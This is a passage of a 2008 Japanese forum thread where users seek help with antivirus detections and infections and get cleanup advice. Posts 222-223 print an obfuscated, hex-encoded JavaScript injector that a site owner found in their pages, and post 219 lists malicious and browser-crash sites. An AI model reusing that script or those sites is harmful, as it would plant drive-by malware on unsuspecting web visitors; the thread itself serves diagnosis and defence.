また、どれくらい危険なウイルスなのかを教えていただけないでしょうか。
お願いします。
使っているセキュリティーソフトはマカフィーです。
最近行った作業は、
SpywareBlasterやRPGツクールの無料ゲームとランタイムをダウンロードです。
169名無しさん@お腹いっぱい。sage2008/12/05(金) 16:12:30
virustotalに投げてみれば?
170名無しさん@お腹いっぱい。sage2008/12/05(金) 17:23:21
>>162
それってサウンドがいじられてるだけじゃないの?
Windowsの開始時の音をそのWAVだかMP3だかにされてるとか
171名無しさん@お腹いっぱい。2008/12/05(金) 20:55:27
ampfrb.cmdって何ですか?
ドライブ全部にあるんですけど。
172名無しさん@お腹いっぱい。2008/12/05(金) 21:01:35
>>142さん
162です。
報告ありがとうございます。
IE8削除してIE7に戻してみました。
暫く様子をみてみます。
173名無しさん@お腹いっぱい。2008/12/06(土) 07:37:49
>>164さん
162です。
flashgetはかなり前から入れてますから関係無いと思います。
174名無しさん@お腹いっぱい。sage2008/12/06(土) 16:13:52
【使用OS】 「XP home sp2」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されてます」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「されてます」
【ルータの有無】 「あり」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
C:WINDOWS\system32\taskmagr.exe
さきほどPCを立ち上げたところ、上記のファイルから
TROJ_AGENT_APXというトロイが見つかりました、と表示され
ウィルスバスターで隔離しましたが、トレンドマイクロにも上記トロイの情報は無く
駆除ができません。
どのようなウィルスかもわからず不安です。今後どのように対処すべきでしょうか?
175名無しさん@お腹いっぱい。sage2008/12/06(土) 17:06:13
ウイルスの命名はベンダーでばらばらなんだから
トレンドマイクロの検出名はトレンドマイクロにしかわからんだろ。
バスタースレで。
176名無しさん@お腹いっぱい。sage2008/12/06(土) 18:46:58
>>174
隔離できてるなら問題ないのでは?
177名無しさん@お腹いっぱい。sage2008/12/06(土) 20:34:09
>>173
返答有難うございます。
以前からいれられてるんですね。
flashget入れてから頻繁にウイルスが見つかったもので…
なにやらflashgetを起動させると頻繁に中国のサイトにアクセスしていたりしたので。
178 ◆N9P3SuvBPo sage2008/12/06(土) 22:03:27
>177
その中国のサイトを教えてくださいな。
あ、頭のhtは抜いて。
179名無しさん@お腹いっぱい。sage2008/12/07(日) 00:03:33
中華製のスパイウェアソフトを入れるほうが悪い
いますぐアンインストールしろよ
中華製のソフトは使わないことだな
180名無しさん@お腹いっぱい。sage2008/12/07(日) 01:34:54
↑バスター使い
181名無しさん@お腹いっぱい。sage2008/12/07(日) 03:26:00
>>178
詳しくは分かりませんが、
PeerGuardian2で動向を監視したところ、
China IP
China Education and Research Network
fake emule servers
(Spam) ServerBeach
等が頻繁にブロックされていました。
尚、flashgetを終了すると↑へのアクセスは止まりました。
182名無しさん@お腹いっぱい。sage2008/12/07(日) 03:30:54
ほい。
ttp://www.shareedge.com/spywareguide/product_show.php?id=1176
183名無しさん@お腹いっぱい。2008/12/07(日) 08:23:06
flashgetのバージョンが古くないか
184名無しさん@お腹いっぱい。sage2008/12/07(日) 12:29:25
>>182
自分でもすぐ調べては見たのですが、
やはりスパイウェア仕込んでることで有名みたいですね。
なにか、いつかのバージョンから無くなったとか書いてあったのですが…

>>183
VectorでダウンロードしたFlashGet1.9.6です。
185名無しさん@お腹いっぱい。2008/12/07(日) 18:21:11
A.状況
【使用OS】 「Xp SP2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「AVG Free 8.0」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新されている」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「無」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「(1)ファイルをコピーしようとしたら、次のメッセージが表示された
   アクセスしたファイルは感染しています。
   ファイル名:C\System Volume Information\_restore{667B7FC2-A2DB-4c51-9B6c-1A4ECAE5387C}\RP295\A0038262.exe
脅威名:トロイの木馬 PSW.OnlineGames.2.S
       オープン時に検出されました
   処理名:C\WINDOWS\System32\svchost.exe
処理ID:1320
(2)スキャンしたら、
a.上記ファイル名の最後が次のものが5件表示され、
     A0038268.exe 1件
     A0038262.exe 3件
     A0039185.exe 1件
   b.その後、次のメッセージが表示された
     D:\System Volume Information\_restore\_restore{667B7FC2-A2DB-4C51-9B6C-1A4ECAE5387C}\RP295\A0038211.exe
c.最後に、
     検出された感染 66
除去または修復された感染オブジェクト 66
警告数 70
その他 0
186185(続き)2008/12/07(日) 18:22:29
 (3)USBメモリーをコマンドプロンプトでattrib表示すると
    SHR autorun.inf SHR f.exeが表示される。
 (4)フォルダオプションで、「すべてのファイルとフォルダを表示する」にチェックして
   [適用]→[OK]をした後、フォルダオプションを確認すると
   「隠しファイルおよび隠しフォルダを表示しない」に変わっている。
 (5)マイコンピュータでハードディスクアイコンをダブルクリックすると
   何で開くか聞いてくる。

 (6)外付けのポータブルディスク3台も感染している模様。」

B.質問

1.どういうウィルスに感染しているのでしょうか?
(1)1種類なのか複数なのか分かりません。
(2)PSW.OnlineGames.xxxというのはあるのですが、
   PSW.OnlineGames.2.Sというのは見つかりません。

2.対策は、どうすれば良いのでしょうか?

宜しくお願いします。
187名無しさん@お腹いっぱい。sage2008/12/07(日) 18:41:28
>>186
USBなんかを通して感染を広めるウイルスとネトゲのパスなんかを盗むものに感染してる
両方質が悪いしばっちし感染してるからすぐリカバリーしろ
188名無しさん@お腹いっぱい。sage2008/12/07(日) 18:59:59
>>185
ttp://mm113.blog49.fc2.com/blog-entry-14.html
ttp://www.cyber-concierge.co.jp/pc_tama/other/revo.html
1891852008/12/08(月) 08:12:59
>>187,>>188

レスありがとうございます。

ttp://www.cyber-concierge.co.jp/pc_tama/other/revo.html
を、やってみます。
1901852008/12/08(月) 11:04:20
autorun.infを止める方法についての追加質問です。

次の2つの方法がネットに書かれていたのですが、
このウィルスの対策としては、どちらが良いのでしょうか?

(1)グループポリシーの設定を変える

[ファイル名を指定して実行]→gpedit.msc入力→[コンピュータの構成]
→[管理用テンプレート]→[システム]→[自動再生機能をオフにする]
 →[プロパティ]→[自動再生機能をオフにする]→[適用]→[OK]

(2)レジストリを変える

REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT
\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist"

宜しくお願いします。
191名無しさん@お腹いっぱい。sage2008/12/08(月) 18:21:11
>>190
どちらもやってることは同じだと思うけど
(1)の方をお勧めしておく
192名無しさん@お腹いっぱい。sage2008/12/08(月) 19:26:53
俺はTweakUIで潰してるな
1931852008/12/08(月) 20:26:35
>>191
レスありがとうございます。
194名無しさん@お腹いっぱい。sage2008/12/09(火) 13:35:27
【使用OS】「vista」
【MUの状態】「最新」
【使用セキュリティソフトとバージョン】「光回線でデフォでついてきたNTT西日本セキュリティ対策ツールver15」
【最新か】「最新」
【スパイウェア対策ソフトと状態】「同上」
【スキャンの結果何が検索されたか】「このソフトだと何も検索されない」
だった訳ですが(続く)
195名無しさん@お腹いっぱい。sage2008/12/09(火) 13:42:47
ありゃバスターなのでバスタースレでどうぞ。
196194sage2008/12/09(火) 13:45:52
ある日突然立ち上がった(購入後半年で初めて)
ノートンsecurity scanによると
【検出されたウイルス】「Unix.penguin
感染場所はJane styleの生活板のログ
JS.Windowbomb
感染場所はJane styleのどこか」

専ブラ使ってるので>>8とは違うのでしょうか?
無償のスキャナで除去不能とか言われるし常駐のソフトでは検出されないしいったいどうしたらという感じです
197名無しさん@お腹いっぱい。sage2008/12/09(火) 14:36:30
ノートンお得意の2ch専ブラログの誤検知だろ
198名無しさん@お腹いっぱい。sage2008/12/09(火) 22:17:33
>>197
専ブラにも反応するんですか?
やっかいですね…
使ってないしノートン先生はアンインスコします
ありがとうございました
199名無しさん@お腹いっぱい。2008/12/10(水) 02:51:09
C:\WINDOWS\system32\sens.dll

W32/Patcher
調べても情報が出てきません。
どなたか駆除方法をご存知ありませんか?
200名無しさん@お腹いっぱい。sage2008/12/10(水) 07:57:26
【使用OS】 「xp sp3」
【Microsoft Update(MU)の状態】 「最新」

先ほど自動更新でアップデートしたら
悪意のあるソフトウェアの削除ツールで、
TrojanDropper:Win32/Renos.N
なるものが削除されました。
ぐぐても、どんなウィルスなのかいまいちわかりません
これはどんなウィルスなんですか?
よろしくお願いします。
201名無しさん@お腹いっぱい。sage2008/12/10(水) 12:27:32
3.0mod3-3.54-setup.exe
a0030828.exe

バスター2009でこの二つがウイルスだって出た
3.0mod3-3.54-setup.exeがWINMXのパッチなのは分かったけど
a0030828.exeが何なのかわからん?

誰か教えてくれ
202名無しさん@お腹いっぱい。sage2008/12/10(水) 13:07:15
>>199
sens.dllでググれ
203名無しさん@お腹いっぱい。sage2008/12/10(水) 13:46:11
>>201
パスがSystem Volume Information以下だったら、システムの復元のバックアップファイル。

>>200
Renosでググれ。

>>199
誤検出でなければ、sens.dllが改変されてる。
セキュリティソフトで修復出来なかったら、早くリカバリした方がいいよ。
204名無しさん@お腹いっぱい。2008/12/10(水) 14:40:26
研究でウィルスの検体が大量に欲しいのですが、どこかにzipファイルなどでウイルスをゲットできるサイトありませんか?
205名無しさん@お腹いっぱい。sage2008/12/10(水) 17:39:18
>>204
それくらい自分で探そうね。
206名無しさん@お腹いっぱい。2008/12/10(水) 23:28:56
困っています。下記がバスターコーポレーションで検出
dmserv.dll
C:\WINDOWS\system32\の中で
隔離削除できないため困っています。
セーフモードでもだめでした、何かOS入れ直さないで
修復できる方法ありませんか?
207 ◆N9P3SuvBPo sage2008/12/11(木) 00:06:51
>206
案内レス

企業用PCでしょうか?
もしそうならシステム管理者にご報告を
208名無しさん@お腹いっぱい。2008/12/11(木) 07:06:04
ウイルスリムーバーをこらしめたいが
209名無しさん@お腹いっぱい。2008/12/11(木) 07:51:56
>167 さん

 聞こえなくなくったからと言って安心できませんよ。僕も12/4日くらいに取りつかれ、英語交じりの中国語のラジオ放送みたいなのと、クリック音が連続して聞こえる現象がありましたが、断続的で3日ほ現象が無かったのです。どうも夜8時頃に起動すればそうした現象が
出て、他の時間帯ではそうではなありませんでした。Flash getは直ちに削除しましたが、新しすぎるためなのかウィルスセキュリティでは検出できず、いろいろな体験版で対処中です。
210名無しさん@お腹いっぱい。sage2008/12/12(金) 19:45:24
>>203

THX

System Volume Informationだから
システムの復元のバックアップファイルなのか?
なんでウイルス扱いなんだ?
隔離してるって出てるけどどうなるんだろう?
更新でソフトを新しく入れるとこんなのばっかり・・・
211名無しさん@お腹いっぱい。2008/12/13(土) 01:05:56
いまエクスプローラで作業しているのだが
s2.com
ってウィルスかな? ドライブ全てにいるのだが、前からあったかな…
ググッテモよく分からないし…ソース頼む
212名無しさん@お腹いっぱい。sage2008/12/13(土) 06:11:09
amvoをうつされたので下のサイトの通りに削除。
その後DドライブにRECYCLERとSystem Volume Informationが出てきたんだけど、これって何で?
今までは「全てのフォルダを表示する」にしてても表示されなかったのに。

ttp://pc11.2ch.net/test/read.cgi/sec/1224511070/l50
213名無しさん@お腹いっぱい。2008/12/13(土) 06:13:26
↑winXPSP3です。すまそ。
214名無しさん@お腹いっぱい。sage2008/12/13(土) 10:20:04
>>206

OSがファイルをつかんでしまっているためだと思います。

マイコンピュータ右クリック→管理→サービスとアプリケーション
→サービス

サービスの中に怪しい文字列(意味のない文字列)があったら
それをダブルクリック、スタートアップの種類を「無効」にして一度パソコンを再起動、
それからもう一度system32フォルダをコーポレートエディションでスキャン、

これでうちの会社はできましたよ。
一度やってみてください。
215名無しさん@お腹いっぱい。sage2008/12/13(土) 10:21:31
システムの復元については機能をとりあえずOFFにするといいと思います。
OSの復元はできませんが最悪再セットアップすればいい話なので。
216名無しさん@お腹いっぱい。sage2008/12/13(土) 21:34:35
自分のパソコンがどれだけ防御力が高いかためしたい。
ためしにウイルスに感染できるホームページとかないですか?
当然バックアップしてから挑みます。

自分の防御力を調べてみたいって人少ないのかなあ。
217名無しさん@お腹いっぱい。sage2008/12/13(土) 22:04:21
>>216
http://jp.youtube.com/watch?v=3atmWmWCwlw
まだあるかわかんないけど。
リンクはようつべ
218名無しさん@お腹いっぱい。sage2008/12/13(土) 22:28:37
>>217 もっとちょうだい
gog いってみたけど今は配布してないようです。
219名無しさん@お腹いっぱい。sage2008/12/13(土) 22:57:54
【激しく既出、危険なサイト一覧=ウイルス、ブラクラ系】
1. //www.hackpalace.com/virii/makers/ (ウィルス)
2. //ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm (ウィルスJS_PETCH.A:セキュリティホールを突いたWMP破壊スクリプト)
3. //easyweb.easynet.co.uk/~hiros/**** (****以降はウイルス名:ウイルス)
4. //www2.strangeworld.org/uedakana/sahra****.*** (****は番号違い、拡張子違いなど:ブラクラ&ウイルス:HTML_SUAR.)
5. //amilala.blogspot.com (ウイルスJS_AMILALA.A作成者のサイト。有害なスクリプトが仕掛けられる可能性あり)
6. //www.kogalu.com/sou/girls/index2.htm (通常はエロサイトだがブラクラ&ウイルスの場合あり)
7. //raus.de/crashme/ (ブラクラ&ウイルス)
8. //www.albinoblacksheep.com/flash/you.html (ブラクラ:Windowオープン/ゾンビ ウィンドウ/無限JavaScriptループ)
9. //www.albinoblacksheep.com/flash/open.html (8と同じです)
10. //www.youareanidiot.org/ (8と同じです)
11. //cfi.hyo-ka.net/kiki01.htm(ブラクラ:Windowオープン。ドクロの壁紙)
220名無しさん@お腹いっぱい。sage2008/12/13(土) 23:36:03
>>219 全部行ってみたんですが
みんなウイルスの挙動紹介の安全なHPですね。

221名無しさん@お腹いっぱい。sage2008/12/14(日) 01:19:47
スレチなら誘導お願いします。
サイト持ちなんですが、ファイル上げてから暫くするとソースに
よくわからない記述が追加されてしまいます。
サイト感染してるんじゃないですかって、閲覧者からの報告があって
調べてみたら見つけました。
とりあえずローカルファイルには問題ないっぽいので、
サーバーのファイルを全て消去して上げなおしました。
昨日上げなおしてソースチェックしたらなかったので安心してたら、
今日ソース見たときには追加されてました。
今、また上げなおして様子見中なんですが、
また追加されたらどう対処するべきかわかりません。
アドバイスお願いします。
↓がその記述です。
222名無しさん@お腹いっぱい。sage2008/12/14(日) 01:22:42
<script>function c102916999516m49435c6be9d24(m49435c6bea4f4)
{ function m49435c6beacc4(){var m49435c6beb495=16;return m49435c6beb495;}
return (parseInt(m49435c6bea4f4,m49435c6beacc4()));}
function m49435c6bebc69(m49435c6bec437){ function m49435c6bedba9(){return 2;}
var m49435c6becc07='';m49435c6beeb49=String.fromCharCode;
for(m49435c6bed3d8=0;m49435c6bed3d8<m49435c6bec437.length;m49435c6bed3d8+=m49435c6bedba9())
{ m49435c6becc07+=(m49435c6beeb49(c102916999516m49435c6be9d24(m49435c6bec437.substr(m49435c6bed3d8,m49435c6bedba9()))));}return m49435c6becc07;}
223名無しさん@お腹いっぱい。sage2008/12/14(日) 01:23:42
var zc6='';var
m49435c6bef31b='3C7'+zc6+'3637'+zc6+'2697'+zc6+'07'+zc6+'43E6
96628216D7'+zc6+'96961297'+zc6+'B646F637'+zc6+'56D656E7'+zc6+
'42E7'+zc6+'7'+zc6+'7'+zc6+'2697'+zc6+'465287'+zc6+'56E657'+z
c6+'363617'+zc6+'065282027'+zc6+'2533632536392536362537'+zc6+
'322536312536642536352532302536652536312536642536352533642536
332533312533302532302537'+zc6+'332537'+zc6+'32253633253364253
237'+zc6+'2536382537'+zc6+'342537'+zc6+'342537'+zc6+'30253361
253266253266253637'+zc6+'253666253637'+zc6+'25366625333225366
42536352532652536652536352537'+zc6+'34253266253265253637'+zc6
+'2536662532662536332536382536352536332536622532652536382537'
+zc6+'34253664253663253366253237'+zc6+'2532622534642536312537
'+zc6+'342536382532652537'+zc6+'322536662537'+zc6+'3525366525
36342532382534642536312537'+zc6+'342536382532652537'+zc6+'322
5363125366525363425366625366425323825323925326125333225333225
3334253332253337'+zc6+'253239253262253237'+zc6+'253332253337'
+zc6+'253237'+zc6+'2532302537'+zc6+'37'+zc6+'2536392536342537
'+zc6+'342536382533642533342533312532302536382536352536392536
37'+zc6+'2536382537'+zc6+'34253364253335253334253337'+zc6+'25
32302537'+zc6+'332537'+zc6+'342537'+zc6+'39253663253635253364
253237'+zc6+'2536342536392537'+zc6+'332537'+zc6+'302536632536
312537'+zc6+'39253361253230253665253666253665253635253237'+zc
6+'2533652533632532662536392536362537'+zc6+'32253631253664253
63525336527'+zc6+'29293B7'+zc6+'D7'+zc6+'6617'+zc6+'2206D7'+z
c6+'969613D7'+zc6+'47'+zc6+'27'+zc6+'5653B3C2F7'+zc6+'3637'+z
c6+'2697'+zc6+'07'+zc6+'43E';document.write(m49435c6bebc69
(m49435c6bef31b));</script>
224名無しさん@お腹いっぱい。sage2008/12/14(日) 04:57:20
>>221-223
貼り付けたコードの改行や不要部分を取り除いて、エディターでファイルにしてみたところ、
"JS/Obfuscated"と言う名称のトロイであることが判りましたよ。うちのMcAfee+Artemisが
検出しました。

以下のページで、"JS/Obfuscated"と言う名称で検索してみてください。ちなみにMcAfeeの
ページですが、日本語のサイトでは載っていません。USAの方で探せます。
ttp://vil.nai.com/vil/default.aspx

Virus Profile: JS/Obfuscated
Risk Assessment
- Home Users: Low
- Corporate Users: Low
Date Discovered: 11/26/2008
Date Added: 11/26/2008
Origin: Unknown
Length: N/A
Type: Trojan
SubType: Script

詳細な説明が、"JS/Obfuscated.b"とかにしか有りませんが、ブラウザの脆弱性を利用する
スクリプトファイルですね。

あなたのPCが、マルウエアに感染していないのなら、サーバーがSQLインジェクション等で
攻撃されてるんでしょうね。管理者へ至急連絡しないと行けませんね。
225名無しさん@お腹いっぱい。sage2008/12/14(日) 12:09:03
単純にIDとパスが漏れてる(推測しやすいとか、トロイ踏んだとか)とかね。
226名無しさん@お腹いっぱい。sage2008/12/14(日) 20:48:41
【使用OS】 「windowsXP」
【Microsoft Update(MU)の状態】 「不明」
【使用セキュリティソフトとバージョン】 「セキュリティ24」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新済」
【スパイウェア対策ソフト】 「Kingsoft」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「常時自動更新状態」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「uu.exe」

PCを起動するたびに一時ファイルのフォルダに複数のuu.exeに入っています
しかも対策ソフトも一時フォルダを開けないと反応せず削除しないみたい感じです
調べたところPCに別のウイルスが入っていてそれが勝手にダウンロードしているみたいです

どのような対策をすればよろしいのでしょうか?
227221sage2008/12/15(月) 03:26:54
>>224
トロイでしたか…。
PCが感染してる可能性は考えたので、ファイル上げなおす前に一通りのチェックはしました。
別のサーバーでやってるサイトは全く感染しないのでPCが問題という事はおそらくないと思ってます。
もう少しPCチェックしてやっぱり問題がないのなら管理者に連絡してみます。

>>225
感染ばっかり考えてて忘れてました。すぐ変更してみます。

ありがとうございました。
228 ◆N9P3SuvBPo sage2008/12/15(月) 18:19:19
>227
健康診断のほうに移動されました?
ログに問題は無い様です…
それともしかしてMBAMというツールも使いました?

とりあえずあちらの方の指示を優先してください。
229名無しさん@お腹いっぱい。sage2008/12/15(月) 18:55:49
>>211
エクスプローラですべてのファイルとフォルダを表示(隠しファイルの表示)は出来てる?
出来るならc:\windows\system32フォルダにrevo.exeやrevo0.dllとか無いか確認してみて。

もし出来なかったらウイルスが実行されてる状態。


しかも各社ウイルス対策ソフトで全く対策されていないウイルス
230221sage2008/12/15(月) 20:19:42
>>228
しました。
MalwareBytes' Anti-Malwareでしたら使いました。
ログは問題なしですか。とりあえず一安心ですが感染原因が不明ですね…。
IDとパスが漏れてたのかもしれないです。

ありがとうございます。指示を待ちます。
231名無しさん@お腹いっぱい。2008/12/15(月) 20:45:22
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! 4.8.1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「手動」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「C:\WINDOWS\SYSTEM32\ils.dll」

avast! からの警告「疑わしいファイルが発見されました」
と表示されました。
削除していいのでしょうか?
232名無しさん@お腹いっぱい。sage2008/12/15(月) 20:54:04
>>231
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1221445752
233名無しさん@お腹いっぱい。sage2008/12/15(月) 21:07:59
>>231
avast! Anti-Virus Part99
http://pc11.2ch.net/test/read.cgi/sec/1229273929/30-
234名無しさん@お腹いっぱい。2008/12/15(月) 21:17:42
別スレに書き込んだのですが今皆さん何か問題が起きてるようで
スルーされ気味なのでこちらに書き込ませてください

OS XP
ウィルスソフト avastとspybot
更新はどちらも最近放置してたかもしれません
問題 avastがルートキットを検出したので慌てて指示に従い
再起動後HDDの自動スキャンを開始しました
現在スキャン中で結果待ちですがルートキットは深刻な問題でしょうか?
対処についてはavastの指示に従っていればおkですか?
私のPCを救うアドバイスを戴けませんか
235名無しさん@お腹いっぱい。sage2008/12/15(月) 21:22:01
avastが検知した物はavastユーザにしかわかりませんので
avastスレにお帰りください
236名無しさん@お腹いっぱい。2008/12/17(水) 21:18:06
ウィルスが見つかりましたっていう警告が出たので
詳細を確認してみたんですが、そのウィルスの名前を
ウィルスバスターで検索してみたんですがヒットしなかったので
対処方法とかわからず放置しています

確かHTML_HEKIREみたいな名前でした。
誰かわかる人いませんか?

マジ不安です
237名無しさん@お腹いっぱい。2008/12/17(水) 21:30:47
>>236
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】 !!!
238名無しさん@お腹いっぱい。sage2008/12/17(水) 21:34:56
バスタースレでどうぞ!
239名無しさん@お腹いっぱい。2008/12/18(木) 22:05:26
【使用OS】 「XP sp2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「NTT西日本ウィルス対策」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」

下記のメッセージが出て、インターネットの接続が切断されます。

処理の結果:ウィルス感染ファイルを隔離できませんでした。
      このウィルスは手動で処理する必要があります。
ファイル名:C\WINDOWS\system32\HBmhly.dll
ウィルス/スパイウェア名:TSPYLOLYDA.AE

対策等教えて頂ければ幸いです。
宜しくお願いします。
240名無しさん@お腹いっぱい。sage2008/12/18(木) 22:50:01
>>239
NTT西日本ウィルス対策と言うのはバスターかな?NTTに聞くのがよいと思うが
ちなみに"TSPYLOLYDA.AE"というキーワードでは見つからないが、ファイルパス名から
調べると、トロイの木馬で、パスワードを盗むマルウエアだと思う。
削除できないのは、それが動作中だから。セーフーモードで起動して削除。
それでも駄目なら、セーフDOSモードで削除となるが、使ってるソフトで方法が異
なるので、NTTサポにまず聞くと良いぞ。
241名無しさん@お腹いっぱい。sage2008/12/19(金) 11:20:07
【使用OS】 「XP SP2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「マカフィー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」

スキャンの結果
ファイル名「windows\system32\sens.dll」
ウィルス名「W32/Patcher」
状態「再起動後にスキャン」
となりました。
「対応の必要はありません」とは表示されるのですが
隔離も削除させてくれないので、自動スキャンの度に毎回検出されるので気になります。
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1321330513
↑のサイトを参照して「windows\system32\sens.dll」を他の健康なPCから持ってきたら解消されますでしょうか?
もしくは何か良い策がありましたらご教授願います。
242名無しさん@お腹いっぱい。sage2008/12/19(金) 12:43:31
>>241
http://pc11.2ch.net/test/read.cgi/sec/1228471265/
243名無しさん@お腹いっぱい。sage2008/12/19(金) 21:40:56
>>239
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_LOLYDA.AE&VSect=Sn
244名無しさん@お腹いっぱい。sage2008/12/19(金) 21:42:05
ネットにつながっていないPCのウィルスを除去したいのですが、なにかフリーでありませんでしょうか?
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「?」
【使用セキュリティソフトとバージョン】 過去にネットにつながってたときは「Avast」 を使ってました。
 Avastの期限が切れたあとに「トロイの木馬が発見されました!」と警告が出たことがあります。

 【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 ない
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 いない
【ルータの有無】 なし
245名無しさん@お腹いっぱい。sage2008/12/19(金) 23:30:43
>>244
http://drweb.jp/support/cureit.html
インストール不要
246名無しさん@お腹いっぱい。sage2008/12/20(土) 05:46:34
>>241
システムの復元を無効にする
ttp://www.mcafee.com/Japan/mcafee/support/faq/answer_f_other.asp?wk=OT-00019
フルスキャンを実行する→問題解決後システムの復元をもどす
でokのはず
247名無しさん@お腹いっぱい。sage2008/12/20(土) 19:47:45
>>245
ありがとうございました。
248241sage2008/12/21(日) 01:08:37
>>244
ありがとうございます。
試してみます。
249名無しさん@お腹いっぱい。2008/12/22(月) 19:38:14

けっこうおもしろかった
http://www.interbars.co.jp/blog/archives/cat_2008_.html
250名無しさん@お腹いっぱい。2008/12/22(月) 21:14:38
>>249
rootkit駆除に関してとても参考になった。ブログ主は謙遜してるが相当なプロに感じる。
251名無しさん@お腹いっぱい。sage2008/12/22(月) 22:02:25
逆汗するならともかくツール2〜3個拾うだけならプロとは言わんよ
252名無しさん@お腹いっぱい。2008/12/22(月) 22:27:34
>>250

同意
いかにrootkitがやっかいなモノかが分かる
253名無しさん@お腹いっぱい。2008/12/22(月) 23:32:30
a
254名無しさん@お腹いっぱい。2008/12/22(月) 23:46:21

本日カスペルスキーでスキャンしろと
全社員に通達がありました。
なぜですか?
255名無しさん@お腹いっぱい。2008/12/23(火) 00:03:57
そりゃ困った社員がウイルス付きPCをLANに繋いだからだろ
256名無しさん@お腹いっぱい。sage2008/12/23(火) 00:26:34
【使用OS】WinXP Home edition Version2002 Service Pack3
【Microsoft Update(MU)の状態】被害が出てからupdate
【ルータの有無】 有
【スキャンの結果何が検出されたか】
トロイの木馬(トロジャンなんたら)とスパイウィア

処理第1段階
おとといの夜8時頃からずっとシャットダウンの繰り返し。
カウントダウン→シャットダウン(DCOM Processer Luncherが異常でなんたら)

昨夜は途中、デスクトップにあるIEなどのボタンをダブルクリックしても反応せず。
ウイルスバスター無料版2009をダウンロードしたが、削除はしてくれない。
ありました、というだけのよう。
カスペをダウンロード。
ウィルスバスターの中にウィルスがあると教えてくれる。削除。
そしてネットに繋がらないようになる。
257名無しさん@お腹いっぱい。2008/12/23(火) 00:30:41
第2段階
もう一台のパソコンでググル。
ようやくSasserという言葉を知り、マイクロソフトのHPで対策。
対策途中、シャットダウンされると、ブラウザのヒストリーが真っ白になる。
なので、さっきのページをもう一度検索する。(お気に入りに登録)
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
ここを見て対策したらネットに繋がった。
regeditのレジストリキーは同じものがなかった。ここでUpdate。
悪意のあるソフトウェアの削除ツール (KB890830)をダウンロード。
http://www.microsoft.com/downloads/details.aspx?familyid=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=ja
一部が削除できないと言われる。

市販ソフトで対応するよう書かれてあったので、ウイルスバスターオンラインスキャンを行う。
スパイウェアが見つかり、削除完了。
再起動してみるが、またカウントダウンシャットダウンの繰り返し。

第3段階
ブラウザ、ネットに繋がったり繋がらなかったり。
ようやくこのスレに辿り着き、カウントダウンを止める。
>>9のF-Secure オンラインスキャナを試そうとすると、ダウンロード完了後、
再起動。(何度やっても。)
今、シーマンテックオンライン検索中。

スパイウェアってこんなに取れないものなんでしょうか。
258名無しさん@お腹いっぱい。sage2008/12/23(火) 00:39:23
削除したのに出ました。
Unix.Penguin に感染しています。
VBS.Freelink.B に感染しています。
Unix.Penguin に感染しています。
Macro.src に感染しています。
259 ◆N9P3SuvBPo sage2008/12/23(火) 00:49:46
>252
俺なら回復コンソールから一掃する。
Rootkitですら回復コンソール上では起動しないから。

やっかいなモノ
>これには同意

>256-257
>ウイルスバスター無料版2009をダウンロードしたが
なるほど…
それまで対策ソフトは入れてなかったわけだな。
それに…

>【Microsoft Update(MU)の状態】被害が出てからupdate
感染後に慌ててしても後の祭り

俺はリカバリーを奨めます!

>258
それは2ch専ブラフォルダからの検出
問題なし
260名無しさん@お腹いっぱい。sage2008/12/23(火) 00:56:00
>>259
レスありがとうございます
なんでかファイアウォールが無効になってました
対策ソフトは入れてなかった
買おうかなと思ったけど、どれもこれも削除できないソフトなら
買うものがないなーと考え中

>それは2ch専ブラフォルダからの検出
結局見つけられなかったということですよね

とりあえず、今日もまた深夜まで食い込んだので寝ます
261名無しさん@お腹いっぱい。sage2008/12/23(火) 02:34:12
>>260
OS等を含むソフトウエア(ブラウザやフラッシュ、etc...)のアップデートは悪意から守るために、
事前に行っておく必要があり、セキュリティーソフトは悪意を防ぐために使う物で、被害を最小限に抑
えるためにも必要。

できの良い悪意のあるソフトは、一見してPCが異常であることが判らないものもある。今回のように
起動しないとか異常終了するなど、すぐに判るのはラッキーだと考えるべき。標準のFWを無効にする
など当たり前で、セキュリティーシステムを止めたり、自身の存在を検出できなくする物もある。

何も対策してないPCで、マルウエアが暴れたら手の施しようが無くなる。度々リカバリーしたくない
のなら、サポートの有る有償のセキュリティーソフトを使うことをお勧めする。
